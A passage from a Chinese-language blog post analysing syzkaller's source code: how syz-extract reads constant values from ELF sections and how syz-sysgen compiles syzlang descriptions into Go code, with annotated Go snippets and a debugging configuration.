class="literal">nil</span></span><br></pre></td></tr></table></figure><p>操作二进制文件的代码主要是这几行：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> data.ExtractFromELF &#123;</span><br><span class="line">    flagVals, err = extractFromELF(bin, params.TargetEndian)</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    flagVals, err = extractFromExecutable(bin)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>若 ExtractFromELF 字段为 false，则 sys-extract 会走下面这个分支，执行函数 extractFromExecutable。该函数将实际执行目标程序，解析其输出并转换为整型数组：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">extractFromExecutable</span><span class="params">(binFile <span class="type">string</span>)</span></span> ([]<span class="type">uint64</span>, <span class="type">error</span>) &#123;</span><br><span class="line">    out, err := osutil.Command(binFile).CombinedOutput()</span><br><span class="line">    <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to run flags binary: %v\n%s&quot;</span>, err, out)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(out) == <span class="number">0</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">var</span> vals []<span class="type">uint64</span></span><br><span class="line">    <span class="keyword">for</span> _, val := <span class="keyword">range</span> strings.Split(<span class="type">string</span>(out), <span class="string">&quot; &quot;</span>) &#123;</span><br><span class="line">        n, err := strconv.ParseUint(val, <span class="number">10</span>, <span class="number">64</span>)</span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to parse value: %v (%v)&quot;</span>, err, val)</span><br><span class="line">        &#125;</span><br><span class="line">        vals = <span class="built_in">append</span>(vals, n)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> vals, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但由于 OS 为 Linux 时，其 ExtractFromELF 标志为 true，因此会执行 extractFromELF 函数。在该函数中， syz-extract 将<strong>不会实际执行程序</strong>，而是<strong>从 ELF 文件中一个名为 <code>syz_extract_data</code> 的 section 中读取常量值</strong>：</p><blockquote><p>而且也执行不起来，因为先前手动不让二进制文件执行 link 操作，还没 main 函数。</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">extractFromELF</span><span class="params">(binFile <span class="type">string</span>, targetEndian binary.ByteOrder)</span></span> ([]<span class="type">uint64</span>, <span class="type">error</span>) &#123;</span><br><span class="line">    f, err := os.Open(binFile)</span><br><span class="line">    <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">    &#125;</span><br><span class="line">    ef, err := elf.NewFile(f)</span><br><span class="line">    <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> _, sec := <span class="keyword">range</span> ef.Sections &#123;</span><br><span class="line">        <span class="keyword">if</span> sec.Name != <span class="string">&quot;syz_extract_data&quot;</span> &#123;</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        &#125;</span><br><span class="line">        data, err := ioutil.ReadAll(sec.Open())</span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">        &#125;</span><br><span class="line">        vals := <span class="built_in">make</span>([]<span class="type">uint64</span>, <span class="built_in">len</span>(data)/<span class="number">8</span>)</span><br><span class="line">        <span class="keyword">if</span> err := binary.Read(bytes.NewReader(data), targetEndian, &amp;vals); err != <span class="literal">nil</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> vals, <span class="literal">nil</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;did not find syz_extract_data section&quot;</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>这样做的目的貌似是为了<strong>提高常量读取速度</strong>，因为读取文件远比执行程序来的快。</p></blockquote><h3 id="8-小结">8. 小结</h3><p>syz-extract 会调用自定义 compiler 解析 syzlang 为 ast 森林，并依次提取每个 ast 树上的 consts 节点，然后将这些 consts 节点上的字符串放置进模板中，编译模板生成一个 ELF 或其他可执行文件。</p><p>接下来 syz-extract 会分析 ELF 文件上的数据，或者尝试执行可执行文件来解析其输出，以获得各个 consts 字符串所对应的具体整型值。</p><p>最后 syz-extract 将获取到的 consts 字符串与具体整型的映射关系，一个个序列化并填入 <code>.const</code> 文件中，这样便生成了对应于每个 syzlang 文件的 .const 文件。</p><p>在 syz-extract 执行的整个过程中，syz-extract 另起一个 go routine 来执行 worker，是为了能达到边进行常量提取，边将先前已有的提取结果存放进文件中，这样做是为了提高效率，加快常量提取的速度。</p><p>调试用的 vscode launch.json 文件：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;version&quot;</span><span class="punctuation">:</span> <span class="string">&quot;0.2.0&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;configurations&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;syzextractLaunch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;go&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;request&quot;</span><span class="punctuation">:</span> <span class="string">&quot;launch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;mode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auto&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;program&quot;</span><span class="punctuation">:</span> <span class="string">&quot;$&#123;fileDirname&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;env&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/syzkaller&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">&quot;-sourcedir&quot;</span><span class="punctuation">,</span> <span class="string">&quot;/usr/class/linux&quot;</span><span class="punctuation">,</span> <span class="string">&quot;-arch&quot;</span><span class="punctuation">,</span> <span class="string">&quot;amd64&quot;</span><span class="punctuation">]</span> </span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><h2 id="三、syz-sysgen">三、syz-sysgen</h2><blockquote><p>代码位于 <code>sys/syz-sysgen/sysgen.go</code> 中。</p></blockquote><p>syz-gen 用于解析人工编写的 syzlang 代码文件，并将其 syzlang 内部定义的 syscall 类型信息转换成后续 syzkaller 能够使用的数据结构。</p><p>在理解了 syz-extract 的代码后，syz-sysgen 的代码相对来说也比较好理解，接下来我们先从 main 函数开始看起。</p><h3 id="1-main-2">1. main</h3><p>首先是将所有 OS 的类型都取出来，并且创建了用于存储结果的结构体：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey：in Function main</span></span><br><span class="line"><span class="keyword">defer</span> tool.Init()()</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> OSList []<span class="type">string</span></span><br><span class="line"><span class="keyword">for</span> OS := <span class="keyword">range</span> targets.List &#123;</span><br><span class="line">    OSList = <span class="built_in">append</span>(OSList, OS)</span><br><span class="line">&#125;</span><br><span class="line">sort.Strings(OSList)</span><br><span class="line"></span><br><span class="line">data := &amp;ExecutorData&#123;&#125;</span><br></pre></td></tr></table></figure><p>其中第一行的 golang <code>defer</code> 关键字表示，<strong>defer 后面的函数将在整个函数正常返回时被执行</strong>。由于 <code>tool.Init()</code> 涉及到命令行中 CPU/Mem 分析，不在我们的考虑范畴，因此忽略不看。</p><p>完成这段代码的执行后，其变量情况如下图所示：</p><p><img src="/2022/03/syzkaller-1/image-20220309165347651.png" alt="image-20220309165347651"></p><p>紧接着便是一个 for 循环，遍历 OSList 中的每个 OS 字符串，并解析其中的 syzlang 代码。我将这个 for 循环分为了上中下三个部分：</p><ul><li><p>首先是第一部分：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey：in Function main</span></span><br><span class="line"><span class="keyword">for</span> _, OS := <span class="keyword">range</span> OSList &#123;</span><br><span class="line">    descriptions := ast.ParseGlob(filepath.Join(*srcDir, <span class="string">&quot;sys&quot;</span>, OS, <span class="string">&quot;*.txt&quot;</span>), <span class="literal">nil</span>)</span><br><span class="line">    <span class="keyword">if</span> descriptions == <span class="literal">nil</span> &#123;</span><br><span class="line">        os.Exit(<span class="number">1</span>)</span><br><span class="line">    &#125;</span><br><span class="line">    constFile := compiler.DeserializeConstFile(filepath.Join(*srcDir, <span class="string">&quot;sys&quot;</span>, OS, <span class="string">&quot;*.const&quot;</span>), <span class="literal">nil</span>)</span><br><span class="line">    <span class="keyword">if</span> constFile == <span class="literal">nil</span> &#123;</span><br><span class="line">        os.Exit(<span class="number">1</span>)</span><br><span class="line">    &#125;</span><br><span class="line">  osutil.MkdirAll(filepath.Join(*outDir, <span class="string">&quot;sys&quot;</span>, OS, <span class="string">&quot;gen&quot;</span>))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">var</span> archs []<span class="type">string</span></span><br><span class="line">    <span class="keyword">for</span> arch := <span class="keyword">range</span> targets.List[OS] &#123;</span><br><span class="line">        archs = <span class="built_in">append</span>(archs, arch)</span><br><span class="line">    &#125;</span><br><span class="line">  sort.Strings(archs)</span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这部分内容较为简单，将当前遍历到的 OS 所对应的 <code>sys/&lt;os&gt;/*.txt</code> 和 <code>sys/&lt;os&gt;/*.const</code>文件，分别解析成 AST 树 (ast.Description 类型) 和 ConstFile 结构体。之后创建 <code>sys/&lt;os&gt;/gen</code> 文件夹，整个 syz-sysgen 的输出将存放在该文件夹下：</p><p><img src="/2022/03/syzkaller-1/image-20220309170145753.png" alt="image-20220309170145753"></p><p>之后还是收集当前 OS 所对应的全部 arch 字符串集合，并做一次排序操作。</p></li><li><p>其次是第二部分：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey：in Function main</span></span><br><span class="line"><span class="keyword">for</span> _, OS := <span class="keyword">range</span> OSList &#123;</span><br><span class="line">    ...</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">var</span> jobs []*Job</span><br><span class="line">    <span class="keyword">for</span> _, arch := <span class="keyword">range</span> archs &#123;</span><br><span class="line">        jobs = <span class="built_in">append</span>(jobs, &amp;Job&#123;</span><br><span class="line">            Target:      targets.List[OS][arch],</span><br><span class="line">            Unsupported: <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>),</span><br><span class="line">        &#125;)</span><br><span class="line">    &#125;</span><br><span class="line">    sort.Slice(jobs, <span class="function"><span class="keyword">func</span><span class="params">(i, j <span class="type">int</span>)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> jobs[i].Target.Arch &lt; jobs[j].Target.Arch</span><br><span class="line">    &#125;)</span><br><span class="line">    <span class="keyword">var</span> wg sync.WaitGroup</span><br><span class="line">    wg.Add(<span class="built_in">len</span>(jobs))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> _, job := <span class="keyword">range</span> jobs &#123;</span><br><span class="line">        job := job</span><br><span class="line">        <span class="keyword">go</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> &#123;</span><br><span class="line">            <span class="keyword">defer</span> wg.Done()</span><br><span class="line">            processJob(job, descriptions, constFile)</span><br><span class="line">        &#125;()</span><br><span class="line">    &#125;</span><br><span class="line">    wg.Wait()</span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>首先是为每个 arch 都创建了一个 Job 结构体，将其添加进数组 jobs中，并为数组执行排序操作，其中排序规则是自定义的。</p><p>接下来创建了一个 <code>sync.WaitGroup</code> 结构体，这个结构体用于<strong>等待指定数量的 go routine 集合执行完成</strong>。其内部原理有点类似于信号量，执行 <code>wg.Add</code> 函数以增加其内部计数器值，执行 <code>wg.Done</code> 函数以减小其内部计数器值，执行 <code>wg.Wait</code> 则判断内部计数器值状态，进而选择是否挂起等待。</p><p>其中最重要的是，syz-sysgen 依次遍历 jobs 数组中的每个 job，并创建 go routine 并行执行这些 job。函数 processJob 用于编译先前 parse 的 syzlang AST、分析其中的类型信息与依赖关系，并将其序列化为 golang 代码至 <code>sys/&lt;OS&gt;/gen/&lt;arch&gt;.go</code> 中，同时还将 syscall 属性相关的信息保存在 <code>job.ArchData</code> 中，供后续生成 sys-executor 关键头文件代码所用。</p></li><li><p>最后是第三部分：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey：in Function main</span></span><br><span class="line"><span class="keyword">for</span> _, OS := <span class="keyword">range</span> OSList &#123;</span><br><span class="line">    ...</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">var</span> syscallArchs []ArchData</span><br><span class="line">    unsupported := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">int</span>)</span><br><span class="line">    <span class="keyword">for</span> _, job := <span class="keyword">range</span> jobs &#123;</span><br><span class="line">        <span class="keyword">if</span> !job.OK &#123;</span><br><span class="line">            fmt.Printf(<span class="string">&quot;compilation of %v/%v target failed:\n&quot;</span>, job.Target.OS, job.Target.Arch)</span><br><span class="line">            <span class="keyword">for</span> _, msg := <span class="keyword">range</span> job.Errors &#123;</span><br><span class="line">                fmt.Print(msg)</span><br><span class="line">            &#125;</span><br><span class="line">            os.Exit(<span class="number">1</span>)</span><br><span class="line">        &#125;</span><br><span class="line">        syscallArchs = <span class="built_in">append</span>(syscallArchs, job.ArchData)</span><br><span class="line">        <span class="keyword">for</span> u := <span class="keyword">range</span> job.Unsupported &#123;</span><br><span class="line">            unsupported[u]++</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    data.OSes = <span class="built_in">append</span>(data.OSes, OSData&#123;</span><br><span class="line">        GOOS:  OS,</span><br><span class="line">        Archs: syscallArchs,</span><br><span class="line">    &#125;)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> what, count := <span class="keyword">range</span> unsupported &#123;</span><br><span class="line">        <span class="keyword">if</span> count == <span class="built_in">len</span>(jobs) &#123;</span><br><span class="line">            tool.Failf(<span class="string">&quot;%v is unsupported on all arches (typo?)&quot;</span>, what)</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>第三部分没什么需要特别关注的，这部分主要是做了一些检查，并将先前 worker 里生成的 ArchData 提取进变量 data 中。</p></li></ul><p>for 循环结束后吗，main 函数最后这部分的代码继续为变量 data 设置一些字段：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">attrs := reflect.TypeOf(prog.SyscallAttrs&#123;&#125;)</span><br><span class="line"><span class="keyword">for</span> i := <span class="number">0</span>; i &lt; attrs.NumField(); i++ &#123;</span><br><span class="line">    data.CallAttrs = <span class="built_in">append</span>(data.CallAttrs, prog.CppName(attrs.Field(i).Name))</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">props := prog.CallProps&#123;&#125;</span><br><span class="line">props.ForeachProp(<span class="function"><span class="keyword">func</span><span class="params">(name, _ <span class="type">string</span>, value reflect.Value)</span></span> &#123;</span><br><span class="line">    data.CallProps = <span class="built_in">append</span>(data.CallProps, CallPropDescription&#123;</span><br><span class="line">        Type: value.Kind().String(),</span><br><span class="line">        Name: prog.CppName(name),</span><br><span class="line">    &#125;)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure><p>这部分代码乍看上去可能不太能理解，但仔细一看就能发现，它只是分别将 <code>prog.SyscallAttrs</code> 和 <code>prog.CallProps</code> 这两个结构体对应的字段名存了起来。俩结构体声明如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// SyscallAttrs represents call attributes in syzlang.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This structure is the source of truth for the all other parts of the system.</span></span><br><span class="line"><span class="comment">// pkg/compiler uses this structure to parse descriptions.</span></span><br><span class="line"><span class="comment">// syz-sysgen uses this structure to generate code for executor.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Only bool&#x27;s and uint64&#x27;s are currently supported.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// See docs/syscall_descriptions_syntax.md for description of individual attributes.</span></span><br><span class="line"><span class="keyword">type</span> SyscallAttrs <span class="keyword">struct</span> &#123;</span><br><span class="line">    Disabled      <span class="type">bool</span></span><br><span class="line">    Timeout       <span class="type">uint64</span></span><br><span class="line">    ProgTimeout   <span class="type">uint64</span></span><br><span class="line">    IgnoreReturn  <span class="type">bool</span></span><br><span class="line">    BreaksReturns <span class="type">bool</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// These properties are parsed and serialized according to the tag and the type</span></span><br><span class="line"><span class="comment">// of the corresponding fields.</span></span><br><span class="line"><span class="comment">// IMPORTANT: keep the exact values of &quot;key&quot; tag for existing props unchanged,</span></span><br><span class="line"><span class="comment">// otherwise the backwards compatibility would be broken.</span></span><br><span class="line"><span class="keyword">type</span> CallProps <span class="keyword">struct</span> &#123;</span><br><span class="line">    FailNth <span class="type">int</span> <span class="string">`key:&quot;fail_nth&quot;`</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>实际保存进变量 data 中的内容如下：</p><p><img src="/2022/03/syzkaller-1/image-20220309231414961.png" alt="image-20220309231414961"></p><p>通过对上面源码的分析，我发现貌似 syz-sysgen <strong>将整个 <code>prog.SyscallAttrs</code> 结构体的字段名和每个 syscall 所对应的数据，全都转换成了普通字符串型和整型</strong>。看上去这像是要用这些数据来填充 C 语言模板？我们接下来再来看看 writeExecutorSyscalls 函数，看看这里面具体是做了什么。</p><blockquote><p>writeExecutorSyscalls 函数源码分析位于下文，这里不再赘述。</p></blockquote><h3 id="2-processJob">2. processJob</h3><p>processJob 函数的主要功能是：编译传入的 syzlang AST，分析其中的 syscall 类型信息等，并反序列化为一个 golang 语法源码。</p><p>传入 processJob 的参数 <code>job</code>，其结构体声明如下所示：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">type</span> Job <span class="keyword">struct</span> &#123;</span><br><span class="line">    Target      *targets.Target <span class="comment">// 存放着一些关于特定 OS 特定 arch 的一些常量信息</span></span><br><span class="line">    OK          <span class="type">bool</span></span><br><span class="line">    Errors      []<span class="type">string</span>        <span class="comment">// 保存报错信息的字符串集合，一条字符串表示一行报错信息</span></span><br><span class="line">    Unsupported <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span> <span class="comment">// 存放不支持的 syscall 集合</span></span><br><span class="line">    ArchData    ArchData        <span class="comment">// 存放待从 worker routine 返回给 main 函数的数据</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>首先，该函数会生成一个 error handler，用于输出错误信息；之后从 ConstFile 结构体中，取出对应 arch 的 consts <strong>字符串-&gt;整型</strong>映射表：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line">eh := <span class="function"><span class="keyword">func</span><span class="params">(pos ast.Pos, msg <span class="type">string</span>)</span></span> &#123;</span><br><span class="line">    job.Errors = <span class="built_in">append</span>(job.Errors, fmt.Sprintf(<span class="string">&quot;%v: %v\n&quot;</span>, pos, msg))</span><br><span class="line">&#125;</span><br><span class="line">consts := constFile.Arch(job.Target.Arch)</span><br><span class="line">top := descriptions</span><br></pre></td></tr></table></figure><p><img src="/2022/03/syzkaller-1/image-20220309171903363.png" alt="image-20220309171903363"></p><p>之后，对于一些 Linux OS 需要特殊处理的架构，syz-sysgen 设置了过滤器，过滤掉那些文件名中带有 <code>_kvm.txt</code> 后缀的 syzlang，那些 syzlang 将不参与处理；并且将那些不支持的条目将会存放进 <code>job.Unsupported</code> 中，接下来的操作将跳过这些条目：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line"><span class="keyword">if</span> job.Target.OS == targets.Linux &amp;&amp; (job.Target.Arch == targets.ARM || job.Target.Arch == targets.RiscV64) &#123;</span><br><span class="line">    <span class="comment">// Hack: KVM is not supported on ARM anymore. On riscv64 it</span></span><br><span class="line">    <span class="comment">// is not supported yet but might be in the future.</span></span><br><span class="line">    <span class="comment">// Note: syz-extract also ignores this file for arm and riscv64.</span></span><br><span class="line">    top = descriptions.Filter(<span class="function"><span class="keyword">func</span><span class="params">(n ast.Node)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">        pos, typ, name := n.Info()</span><br><span class="line">        <span class="keyword">if</span> !strings.HasSuffix(pos.File, <span class="string">&quot;_kvm.txt&quot;</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">switch</span> n.(<span class="keyword">type</span>) &#123;</span><br><span class="line">            <span class="keyword">case</span> *ast.Resource, *ast.Struct, *ast.Call, *ast.TypeDef:</span><br><span class="line">            <span class="comment">// Mimic what pkg/compiler would do with unsupported entries.</span></span><br><span class="line">            <span class="comment">// This is required to keep the unsupported diagnostic below working</span></span><br><span class="line">            <span class="comment">// for kvm entries, otherwise it will not think that kvm entries</span></span><br><span class="line">            <span class="comment">// are not supported on all architectures.</span></span><br><span class="line">            job.Unsupported[typ+<span class="string">&quot; &quot;</span>+name] = <span class="literal">true</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">    &#125;)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>除了这些 Linux OS 需要过滤的架构以外，syz-sysgen 还需要过滤掉自己开发者人员测试用的 testOS：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line"><span class="keyword">if</span> job.Target.OS == targets.TestOS &#123;</span><br><span class="line">    constInfo := compiler.ExtractConsts(top, job.Target, eh)</span><br><span class="line">    compiler.FabricateSyscallConsts(job.Target, constInfo, consts)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>其中，targets.TestOS 所对应的字符串为 <code>test</code>。</p></blockquote><p>接下来，syz-sysgen 需要分析 AST 信息，对 syzlang 进行编译：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line">prog := compiler.Compile(top, consts, job.Target, eh)</span><br><span class="line"><span class="keyword">if</span> prog == <span class="literal">nil</span> &#123;</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span> what := <span class="keyword">range</span> prog.Unsupported 